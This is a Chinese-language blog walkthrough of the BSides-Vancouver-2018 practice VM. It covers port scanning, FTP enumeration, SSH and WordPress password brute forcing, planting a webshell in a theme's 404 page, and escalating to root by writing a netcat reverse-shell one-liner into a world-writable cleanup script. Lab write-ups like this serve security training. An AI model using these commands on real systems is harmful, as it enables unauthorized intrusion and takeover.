靶机:BSides-Vancouver-2018-Workshop

2023-11-08 18:40

本文主要是介绍靶机:BSides-Vancouver-2018-Workshop,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

靶机说明
靶机用ValualBox创建,目标是在其上获得root级访问。
目标
Boot to root:获得root权限和Flag。
运行环境
靶机:通过ValualBox打开虚拟机,网络连接方式设置为主机模式(host-only),或者将虚拟机、Kali机都桥接到物理机的无线网卡。测试中使用VMWare导入虚机会无法获得IP,使用ValualBox可正常获得IP。
攻击机:同网段下有Windows攻击机(物理机),安装有Nmap、Burpsuit、Wireshark、Sqlmap、nc、Hydra、Python2.7、DirBuster、AWVS、Nessus等渗透工具。同样可使用Kali Linux作为攻击机,预装了全面的渗透工具。
信息收集

查看靶机的ip发现是192.168.1.35 所以靶机的ip这是这个c段的,我们用nmap扫描下
在这里插入图片描述
nmap扫描出靶机地址
在这里插入图片描述
获取flag
详细扫描一下,发现开放了21 22 80
在这里插入图片描述
发现21端口开着 访问一下 格式是 ftp://192.618.1.32
在这里插入图片描述
发现一个文件 点开看一下发现很多账户名
在这里插入图片描述
在这里插入图片描述
开启了22端口 用超级弱口令检查工具暴破一下 发现密码
在这里插入图片描述
使用Xshell工具登录ssh
在这里插入图片描述
提权
在这里插入图片描述
拿到flag
在这里插入图片描述
获取root权限
通过dirb扫描网站目录发现 存在robots.txt 访问发现一隐藏了一个目录
在这里插入图片描述在这里插入图片描述
发现是一个wp的博客,直接wpscan走一波
wpscan --url http://192.168.1.32/backup_wordpress/ --enumerate u 能爆出用户名
在这里插入图片描述
wpscan --url http://192.168.1.32/backup_wordpress -P/home/sun/文档/12.txt -U john

能爆出密码 需要指定用户名
在这里插入图片描述
至于使用的字典是darkweb2017-top10000.txt 大家可以百度找一下,本章的爆破都是基于darkweb2017-top10000.txt来的
在页面最下方有一个登录按钮
在这里插入图片描述
用刚才爆出密码账号登陆
在这里插入图片描述
我一般碰到wp建的站直接会在404报错界面写入shell,这次很幸运成功了
在这里插入图片描述
在kali本机监听端口 拿到shell
在这里插入图片描述
使用python获得一个新的shell python -c ‘import pty; pty.spawn("/bin/bash")’
在这里插入图片描述
查找每个用户文件,和浏览各目录文件,发现位于 /usr/local/bin/cleanup 文件,其权限是777,查看内容
为:
#!/bin/sh rm -rf /var/log/apache2/* # Clean those damn logs!!
在这里插入图片描述
这是一段清理Apache日志的脚本,需要root权限运行。
查看cleanup文件的权限为777,可以随意修改和执行,可以将文件内容改成一个反弹shell。
echo ‘#!/bin/bash’ > cleanup
在这里插入图片描述
echo ‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.35 6666 > /tmp/f’ >> cleanup

在这里插入图片描述
再次查看 cleanup已经变成这样了
在这里插入图片描述
然后kali开启监听
在这里插入图片描述
再次查看一下cleanup文件就能反弹成功了
在这里插入图片描述
总结
以后见到了开放21端口的知道怎么登陆了,先登一下试试万一允许匿名访问呢
开放22端口的,先用搜集到的密码账户用爆破软件爆一下,可能会有收获,然后Xshell连接一下。
wpscan爆破wp搭建的网站真是神器。
编写反弹shell脚本至cleanup文件思路很特别。
**~~~~~~~~~~~~~~~~~~~~~~·**
至此,本靶机的练习到此结束,感谢各位大佬的倾力帮助,如有侵权,请联系我删除。

这篇关于靶机:BSides-Vancouver-2018-Workshop的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/371785

相关文章

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

2018秋招C/C++面试题总结

博主从8月中旬开始大大小小面试了十几家公司,至今也许是告一段落吧,希望后面会有好结果,因此总结记录一些C/C++方向常见的问题。和大家一起学习! 参考了互联网的各种资源,自己尝试归类整理,谢谢~ 一、C和C++的区别是什么? C是面向过程的语言,C++是在C语言的基础上开发的一种面向对象编程语言,应用广泛。 C中函数不能进行重载,C++函数可以重载 C++在C的基础上增添类,C是一个结构

大厂算法例题解之网易2018秋招笔试真题 (未完)

1、字符串碎片 【题目描述】一个由小写字母组成的字符串可以看成一些同一字母的最大碎片组成的。例如,“aaabbaaac” 是由下面碎片组成的:‘aaa’,‘bb’,‘c’。牛牛现在给定一个字符串,请你帮助计算这个字符串的所有碎片的 平均长度是多少。 输入描述: 输入包括一个字符串 s,字符串 s 的长度 length(1 ≤ length ≤ 50),s 只含小写字母(‘a’-‘z’) 输出描述

vulhub GhostScript 沙箱绕过(CVE-2018-16509)

1.执行以下命令启动靶场环境并在浏览器访问 cd vulhub/ghostscript/CVE-2018-16509 #进入漏洞环境所在目录   docker-compose up -d #启动靶场   docker ps #查看容器信息 2.访问网页 3.下载包含payload的png文件 vulhub/ghostscript/CVE-2018-16509/poc.png at

Python JAVA接口UTC 时间 '2018-08-06T10:00:00.000Z' 格式转化为本地时间

Python JAVA接口UTC 时间 '2018-08-06T10:00:00.000Z' 格式转化为本地时间 方法1 import datetimeorigin_date_str= "2019-07-26T08:20:54Z"utc_date = datetime.datetime.strptime(origin_date_str, "%Y-%m-%dT%H:%M:%SZ")loca

2018年年终体会~

说下最近的一件事情:2018年12月08日华为云培训云原生课程,我坚持了两周,中间休假了,回来就忘记了。错过了一天的打开。这次21天的云原生课程彻底失败。反思后,不是我不想学习,也不是我没有毅力,而是人总是容器在平凡中失去自己,失去自己的目标,就像《千与千寻》中一样,慢慢的生活磨砺自己,慢慢的平淡消耗你自己,你自己都忘记了,自己是为了什么,每年都会给自己立flag,可是很难坚持下去,就

tomato靶机通关攻略

主机发现  用kali去扫描端口,发现有3个开放端口 访问网站    在kali里面进行目录扫描,找到一个antibot_image   找到一个/antibot_image/ 目录,进而找到/antibots/目录  发现可能存在文件包含    页面通过image传参查看passwd文件  页面通过image传参查看日志文件   将一句话木马作为ssh登录的用户

2018Java高级工程师面试总结

2018Java高级工程师面试总结 java高级 2018-10-11 15:11:42 面试的岗位是Java后台开发,面的公司不多,主要有美团点评-网易-网易有道-携程-华为-中兴-科大讯飞-烽火通信这些公司。从前到后简单记录了自己面试时候遇到的问题,以及对面试给了一点点小的建议,给明年甚至以后的师弟师妹们一些参考。欢迎各位朋友一起交流。 关注我:私信回复“架构资料”获取往期Java高级架

.hackme靶机通关攻略

第一步查找ip 通过御剑扫描到IP进入尝试 成功找到靶场 步骤二来到这个靶场注册登录 进来点一下提交出来书名 只有一个框框那就来试试sql注入 1’ and 1=2 --+ 然后查看数据库 -1' union select database(),2,3 # 查看数据库表名 -1' union select group_concat(table_name),2,3

hackme靶机通关攻略

1、登录靶机,查询是否有注入点 2、判断闭合方式 输入OSINT' and 1=1 # 输入OSINT' and 1=2 # 得出闭合方式为单引号 2、查询数据库名 输入-1' union select database(),2,3 # 3、查询数据库中的表 输入-1' union select group_concat(table_name),2,3 from informa